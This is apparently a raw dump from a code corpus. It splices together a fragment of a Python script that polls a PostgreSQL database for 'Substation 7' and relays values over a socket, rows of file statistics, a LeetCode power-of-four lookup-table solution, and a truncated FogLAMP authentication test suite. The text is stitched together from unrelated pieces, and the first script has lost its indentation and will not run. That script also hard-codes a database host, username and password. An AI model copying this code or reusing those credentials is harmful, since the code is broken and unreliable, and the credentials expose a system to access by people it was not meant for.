conn = psycopg2.connect(host="131.180.165.7",database="CRoF",user="postgres", password="crpg")
cursor = conn.cursor()
#Value id 51-66
cursor.execute('''SELECT value from objects WHERE id=51''')
result = cursor.fetchone()
record1 = result[0]
cursor.execute('''SELECT value from objects WHERE id=52''')
result = cursor.fetchone()
record2 = result[0]
cursor.execute('''SELECT value from objects WHERE id=53''')
result = cursor.fetchone()
record3 = result[0]
cursor.execute('''SELECT value from objects WHERE id=54''')
result = cursor.fetchone()
record4 = result[0]
cursor.execute('''SELECT value from objects WHERE id=55''')
result = cursor.fetchone()
record5 = result[0]
cursor.execute('''SELECT value from objects WHERE id=56''')
result = cursor.fetchone()
record6 = result[0]
cursor.execute('''SELECT value from objects WHERE id=57''')
result = cursor.fetchone()
record7 = result[0]
cursor.execute('''SELECT value from objects WHERE id=58''')
result = cursor.fetchone()
record8 = result[0]
cursor.execute('''SELECT value from objects WHERE id=59''')
result = cursor.fetchone()
record9 = result[0]
cursor.execute('''SELECT value from objects WHERE id=60''')
result = cursor.fetchone()
record10 = result[0]
cursor.execute('''SELECT value from objects WHERE id=61''')
result = cursor.fetchone()
record11 = result[0]
cursor.execute('''SELECT value from objects WHERE id=62''')
result = cursor.fetchone()
record12 = result[0]
cursor.execute('''SELECT value from objects WHERE id=63''')
result = cursor.fetchone()
record13 = result[0]
cursor.execute('''SELECT value from objects WHERE id=64''')
result = cursor.fetchone()
record14 = result[0]
cursor.execute('''SELECT value from objects WHERE id=65''')
result = cursor.fetchone()
record15 = result[0]
cursor.execute('''SELECT value from objects WHERE id=66''')
result = cursor.fetchone()
record16 = result[0]
#Value code
cursor.execute('''SELECT code from objects WHERE id=51''')
result = cursor.fetchone()
r1 = result[0]
cursor.execute('''SELECT code from objects WHERE id=52''')
result = cursor.fetchone()
r2 = result[0]
cursor.execute('''SELECT code from objects WHERE id=53''')
result = cursor.fetchone()
r3 = result[0]
cursor.execute('''SELECT code from objects WHERE id=54''')
result = cursor.fetchone()
r4 = result[0]
cursor.execute('''SELECT code from objects WHERE id=55''')
result = cursor.fetchone()
r5 = result[0]
cursor.execute('''SELECT code from objects WHERE id=56''')
result = cursor.fetchone()
r6 = result[0]
cursor.execute('''SELECT code from objects WHERE id=57''')
result = cursor.fetchone()
r7 = result[0]
cursor.execute('''SELECT code from objects WHERE id=58''')
result = cursor.fetchone()
r8 = result[0]
cursor.execute('''SELECT code from objects WHERE id=59''')
result = cursor.fetchone()
r9 = result[0]
cursor.execute('''SELECT code from objects WHERE id=60''')
result = cursor.fetchone()
r10 = result[0]
cursor.execute('''SELECT code from objects WHERE id=61''')
result = cursor.fetchone()
r11 = result[0]
cursor.execute('''SELECT code from objects WHERE id=62''')
result = cursor.fetchone()
r12 = result[0]
cursor.execute('''SELECT code from objects WHERE id=63''')
result = cursor.fetchone()
r13 = result[0]
cursor.execute('''SELECT code from objects WHERE id=64''')
result = cursor.fetchone()
r14 = result[0]
cursor.execute('''SELECT code from objects WHERE id=65''')
result = cursor.fetchone()
r15 = result[0]
cursor.execute('''SELECT code from objects WHERE id=66''')
result = cursor.fetchone()
r16 = result[0]
while True:
data = "a"
dataxy = data.encode()
try:
#Format: mu01_id+value
cursor.execute('''SELECT value from objects WHERE id=51''')
result = cursor.fetchone()
if record1 != result[0]:
print(result[0])
string = "mu01_"+str(r1)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record1 = result[0]
cursor.execute('''SELECT value from objects WHERE id=52''')
result = cursor.fetchone()
if record2 != result[0]:
print(result[0])
string = "mu10_"+str(r2)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record2 = result[0]
cursor.execute('''SELECT value from objects WHERE id=53''')
result = cursor.fetchone()
if record3 != result[0]:
print(result[0])
string = "mu10_"+str(r3)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record3 = result[0]
cursor.execute('''SELECT value from objects WHERE id=54''')
result = cursor.fetchone()
if record4 != result[0]:
print(result[0])
string = "mu10_"+str(r4)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record4 = result[0]
cursor.execute('''SELECT value from objects WHERE id=55''')
result = cursor.fetchone()
if record5 != result[0]:
print(result[0])
string = "mu02_"+str(r5)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record5 = result[0]
cursor.execute('''SELECT value from objects WHERE id=56''')
result = cursor.fetchone()
if record6 != result[0]:
print(result[0])
string = "mu02_"+str(r6)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record6 = result[0]
cursor.execute('''SELECT value from objects WHERE id=57''')
result = cursor.fetchone()
if record7 != result[0]:
print(result[0])
string = "mu03_"+str(r7)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record7 = result[0]
cursor.execute('''SELECT value from objects WHERE id=58''')
result = cursor.fetchone()
if record8 != result[0]:
print(result[0])
string = "mu03_"+str(r8)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record8 = result[0]
cursor.execute('''SELECT value from objects WHERE id=59''')
result = cursor.fetchone()
if record9 != result[0]:
print(result[0])
string = "mu04_"+str(r9)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record9 = result[0]
cursor.execute('''SELECT value from objects WHERE id=60''')
result = cursor.fetchone()
if record10 != result[0]:
print(result[0])
string = "mu04_"+str(r10)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record10 = result[0]
cursor.execute('''SELECT value from objects WHERE id=61''')
result = cursor.fetchone()
if record11 != result[0]:
print(result[0])
string = "mu05_"+str(r11)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record11 = result[0]
cursor.execute('''SELECT value from objects WHERE id=62''')
result = cursor.fetchone()
if record12 != result[0]:
print(result[0])
string = "mu06_"+str(r12)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record12 = result[0]
cursor.execute('''SELECT value from objects WHERE id=63''')
result = cursor.fetchone()
if record13 != result[0]:
print(result[0])
string = "mu07_"+str(r13)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record13 = result[0]
cursor.execute('''SELECT value from objects WHERE id=64''')
result = cursor.fetchone()
if record14 != result[0]:
print(result[0])
string = "mu08_"+str(r14)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record14 = result[0]
cursor.execute('''SELECT value from objects WHERE id=65''')
result = cursor.fetchone()
if record15 != result[0]:
print(result[0])
string = "mu08_"+str(r15)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record15 = result[0]
cursor.execute('''SELECT value from objects WHERE id=66''')
result = cursor.fetchone()
if record16 != result[0]:
print(result[0])
string = "mu08_"+str(r16)+"+"+str(result[0])
datax = string.encode()
conn1.sendall(datax)
print(string)
record16 = result[0]
conn1.sendall(dataxy)
#print(record1)
time.sleep(1)
except:
conn1.close()
conn.close()
print("Connection Close Substation 7")
break
conn1.close()
print("Restart Server Substation 7")
conn.close()
s1.close()
time.sleep(1)
serverX()
serverX()
| 47.2
| 111
| 0.392521
| 1,188
| 14,868
| 4.895623
| 0.107744
| 0.115543
| 0.156809
| 0.148556
| 0.852304
| 0.852304
| 0.83511
| 0.83511
| 0.701513
| 0.701513
| 0
| 0.054147
| 0.509349
| 14,868
| 314
| 112
| 47.350318
| 0.743112
| 0.003968
| 0
| 0.671533
| 0
| 0
| 0.135758
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00365
| false
| 0.00365
| 0.021898
| 0
| 0.025547
| 0.127737
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b60ace879965a7fa78496316b617b576f083f211
| 1,317
|
py
|
Python
|
342.py
|
YukiMuraRindon/LeetcodePractice
|
3c9f84b677e4bc7be1d6b54009768d25536c4c12
|
[
"MIT"
] | null | null | null |
342.py
|
YukiMuraRindon/LeetcodePractice
|
3c9f84b677e4bc7be1d6b54009768d25536c4c12
|
[
"MIT"
] | null | null | null |
342.py
|
YukiMuraRindon/LeetcodePractice
|
3c9f84b677e4bc7be1d6b54009768d25536c4c12
|
[
"MIT"
] | null | null | null |
'''
Created: 2019-09-23 12:13:59
Author : YukiMuraRindon
Email : rinndonn@outlook.com
-----
Description: 给定一个整数 (32 位有符号整数),请编写一个函数来判断它是否是 4 的幂次方。
'''
class Solution:
table = [1, 4, 16, 64, 256, 1024, 4096, 16384, 65536, 262144, 1048576, 4194304, 16777216, 67108864, 268435456, 1073741824, 4294967296, 17179869184, 68719476736, 274877906944, 1099511627776, 4398046511104, 17592186044416, 70368744177664, 281474976710656, 1125899906842624, 4503599627370496, 18014398509481984, 72057594037927936, 288230376151711744, 1152921504606846976, 4611686018427387904, 18446744073709551616, 73786976294838206464, 295147905179352825856, 1180591620717411303424, 4722366482869645213696, 18889465931478580854784, 75557863725914323419136, 302231454903657293676544, 1208925819614629174706176, 4835703278458516698824704, 19342813113834066795298816, 77371252455336267181195264, 309485009821345068724781056, 1237940039285380274899124224, 4951760157141521099596496896, 19807040628566084398385987584, 79228162514264337593543950336, 316912650057057350374175801344, 1267650600228229401496703205376, 5070602400912917605986812821504, 20282409603651670423947251286016, 81129638414606681695789005144064, 324518553658426726783156020576256]
def isPowerOfFour(self, num: int) -> bool:
return num in self.table
'''
md这个思路是真的有毒。。。'''
| 87.8
| 1,046
| 0.843584
| 90
| 1,317
| 12.344444
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.777044
| 0.080486
| 1,317
| 15
| 1,047
| 87.8
| 0.14038
| 0.107821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
377bcf9c47a7b0e5efafef52881ec3331a2f1b95
| 109,880
|
py
|
Python
|
tests/system/python/packages/test_authentication.py
|
foglamp/FogLAMP
|
918dff88b440e6ad580efdaa5f0fbdf4143a73d4
|
[
"Apache-2.0"
] | 65
|
2017-05-15T21:55:04.000Z
|
2022-01-19T01:30:42.000Z
|
tests/system/python/packages/test_authentication.py
|
foglamp/FogLAMP
|
918dff88b440e6ad580efdaa5f0fbdf4143a73d4
|
[
"Apache-2.0"
] | 576
|
2017-05-22T05:41:07.000Z
|
2020-02-13T07:48:58.000Z
|
tests/system/python/packages/test_authentication.py
|
foglamp/FogLAMP
|
918dff88b440e6ad580efdaa5f0fbdf4143a73d4
|
[
"Apache-2.0"
] | 52
|
2017-05-09T22:45:47.000Z
|
2022-03-10T18:49:02.000Z
|
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
""" Test authentication REST API """
import os
import subprocess
import http.client
import json
import time
import pytest
from pathlib import Path
import ssl
__author__ = "Yash Tatkondawar"
__copyright__ = "Copyright (c) 2019 Dianomic Systems"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
TEMPLATE_NAME = "template.json"
SENSOR_VALUE = 12.25
# TODO : pass package_build_version to setup script from conftest.py
package_build_version = "nightly"
HTTP_SOUTH_SVC_NAME = "SOUTH_HTTP"
HTTP_SOUTH_SVC_NAME_1 = "SOUTH_HTTP_1"
ASSET_NAME = "auth"
PASSWORD_TOKEN = None
CERT_TOKEN = None
# This gives the path of directory where FogLAMP is cloned. test_file < packages < python < system < tests < ROOT
PROJECT_ROOT = Path(__file__).parent.parent.parent.parent.parent
SCRIPTS_DIR_ROOT = "{}/tests/system/python/packages/data/".format(PROJECT_ROOT)
context = ssl._create_unverified_context()
def send_data_using_fogbench(wait_time):
execute_fogbench = 'cd {}/extras/python ;python3 -m fogbench -t $FOGLAMP_ROOT/data/tests/{} ' \
'-p http -O 10'.format(PROJECT_ROOT, TEMPLATE_NAME)
exit_code = os.system(execute_fogbench)
assert 0 == exit_code
# Wait until data gets ingested
time.sleep(wait_time)
def add_south_http(foglamp_url, name, token, wait_time, tls_enabled):
payload = {"name": name, "type": "south", "plugin": "http_south", "enabled": True}
post_url = "/foglamp/service"
if tls_enabled:
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
else:
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", post_url, json.dumps(payload), headers={"authorization": token})
res = conn.getresponse()
assert 200 == res.status, "ERROR! POST {} request failed".format(post_url)
res = res.read().decode()
r = json.loads(res)
# Wait for service to get added
time.sleep(wait_time * 2)
return r
def generate_json_for_fogbench(asset_name):
subprocess.run(["cd $FOGLAMP_ROOT/data && mkdir -p tests"], shell=True, check=True)
fogbench_template_path = os.path.join(
os.path.expandvars('${FOGLAMP_ROOT}'), 'data/tests/{}'.format(TEMPLATE_NAME))
with open(fogbench_template_path, "w") as f:
f.write(
'[{"name": "%s", "sensor_values": '
'[{"name": "sensor", "type": "number", "min": %f, "max": %f, "precision": 2}]}]' % (
asset_name, SENSOR_VALUE, SENSOR_VALUE))
@pytest.fixture
def change_to_auth_mandatory_any(foglamp_url, wait_time):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"authentication": "mandatory", "authMethod": "any"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "mandatory" == jdoc['authentication']['value']
conn.request("PUT", '/foglamp/restart', json.dumps({}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "FogLAMP restart has been scheduled." == jdoc['message']
# Wait for foglamp server to start
time.sleep(wait_time * 2)
@pytest.fixture
def change_to_auth_mandatory_password(foglamp_url, wait_time):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api',
json.dumps({"authentication": "mandatory", "authMethod": "password"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "mandatory" == jdoc['authentication']['value']
conn.request("PUT", '/foglamp/restart', json.dumps({}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "FogLAMP restart has been scheduled." == jdoc['message']
# Wait for foglamp server to start
time.sleep(wait_time * 2)
@pytest.fixture
def change_to_auth_mandatory_certificate(foglamp_url, wait_time):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api',
json.dumps({"authentication": "mandatory", "authMethod": "certificate"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "mandatory" == jdoc['authentication']['value']
conn.request("PUT", '/foglamp/restart', json.dumps({}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "FogLAMP restart has been scheduled." == jdoc['message']
# Wait for foglamp server to start
time.sleep(wait_time * 2)
@pytest.fixture
def reset_foglamp(wait_time):
# TODO: Remove kill after resolution of FOGL-1499
try:
subprocess.run(["$FOGLAMP_ROOT/bin/foglamp kill"], shell=True, check=True)
except subprocess.CalledProcessError:
assert False, "kill command failed!"
try:
subprocess.run(["cd {}/tests/system/python/scripts/package && ./reset"
.format(PROJECT_ROOT)], shell=True, check=True)
except subprocess.CalledProcessError:
assert False, "reset package script failed!"
# Wait for foglamp server to start
time.sleep(wait_time)
@pytest.fixture
def remove_and_add_foglamp_pkgs():
try:
subprocess.run(["cd {}/tests/system/python/scripts/package && ./remove"
.format(PROJECT_ROOT)], shell=True, check=True)
except subprocess.CalledProcessError:
assert False, "remove package script failed!"
try:
subprocess.run(["cd {}/tests/system/python/scripts/package/ && ./setup {}"
.format(PROJECT_ROOT, package_build_version)], shell=True, check=True)
except subprocess.CalledProcessError:
assert False, "setup package script failed"
try:
subprocess.run(["sudo apt install -y foglamp-south-http-south"], shell=True, check=True)
except subprocess.CalledProcessError:
assert False, "installation of http-south package failed"
@pytest.fixture
def enable_tls():
def _enable_tls(foglamp_url, wait_time, auth):
conn = http.client.HTTPConnection(foglamp_url)
headers = None
if auth == 'password':
headers = {"authorization": PASSWORD_TOKEN}
elif auth == 'certificate':
headers = {"authorization": CERT_TOKEN}
if headers is None:
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"enableHttp": "false"}))
else:
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"enableHttp": "false"}),
headers=headers)
r = conn.getresponse()
assert 200 == r.status
# FIXME: Remove this wait time
time.sleep(wait_time)
conn = http.client.HTTPConnection(foglamp_url)
if headers is None:
conn.request("PUT", '/foglamp/restart', json.dumps({}))
else:
conn.request("PUT", '/foglamp/restart', json.dumps({}), headers=headers)
r = conn.getresponse()
assert 200 == r.status
# Wait for foglamp server to start
time.sleep(wait_time * 2)
return _enable_tls
@pytest.fixture
def generate_password_based_auth_token(asset_name, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert not jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
@pytest.fixture
def generate_certificate_based_auth_token(asset_name, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global CERT_TOKEN
CERT_TOKEN = jdoc["token"]
class TestTLSDisabled:
def test_on_default_port(self, remove_and_add_foglamp_pkgs, reset_foglamp, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "uptime" in jdoc
assert 0 < jdoc['uptime'], "FogLAMP not up."
def test_on_custom_port(self, foglamp_url, wait_time):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"httpPort": "8005"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "httpPort" in jdoc
assert '8005' == jdoc['httpPort']['value']
# FIXME: Remove this wait time
time.sleep(wait_time)
conn.request("PUT", '/foglamp/restart')
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "FogLAMP restart has been scheduled." == jdoc['message']
# Wait for foglamp server to start
time.sleep(wait_time * 2)
conn = http.client.HTTPConnection("localhost", 8005)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert "uptime" in jdoc
assert 0 < jdoc['uptime'], "FogLAMP not up."
def test_reset_to_default_port(self, foglamp_url, wait_time):
conn = http.client.HTTPConnection("localhost", 8005)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"httpPort": "8081"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "httpPort" in jdoc
assert '8081' == jdoc['httpPort']['value']
# FIXME: Remove this wait time
time.sleep(wait_time)
conn.request("PUT", '/foglamp/restart', json.dumps({}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "FogLAMP restart has been scheduled." == jdoc['message']
# Wait for foglamp server to start
time.sleep(wait_time * 2)
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert "uptime" in jdoc
assert 0 < jdoc['uptime'], "FogLAMP not up."
class TestAuthAnyWithoutTLS:
def test_login_regular_user_using_password(self, reset_foglamp, change_to_auth_mandatory_any,
foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert not jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_logout_me_password_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_login_with_invalid_credentials_regular_user_using_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_username_admin_using_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_login_with_invalid_credentials_admin_using_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_with_user_certificate(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
def test_login_with_admin_certificate(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global CERT_TOKEN
CERT_TOKEN = jdoc["token"]
def test_login_with_custom_certificate(self, foglamp_url, remove_data_file):
# Create a custom certificate and sign
try:
subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True)
subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
shell=True)
subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
"-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
"-set_serial 01 -out custom.cert 2> /dev/null"], shell=True)
except subprocess.CalledProcessError:
assert False, " Certificate creation failed!"
# Login with custom certificate
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = 'custom.cert'
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
# Delete Certificates and keys created
remove_data_file('custom.key')
remove_data_file('custom.csr')
remove_data_file('custom.cert')
def test_ping_with_allow_ping_true(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest_with_password_token(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=False)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest_with_certificate_token(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME_1, CERT_TOKEN, wait_time, tls_enabled=False)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 20 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false_with_password_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
def test_ping_with_allow_ping_false_with_certificate_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users_with_password_token(self, foglamp_url, query, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users_with_certificate_token(self, foglamp_url, query, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles_with_password_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
def test_get_roles_with_certificate_token(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
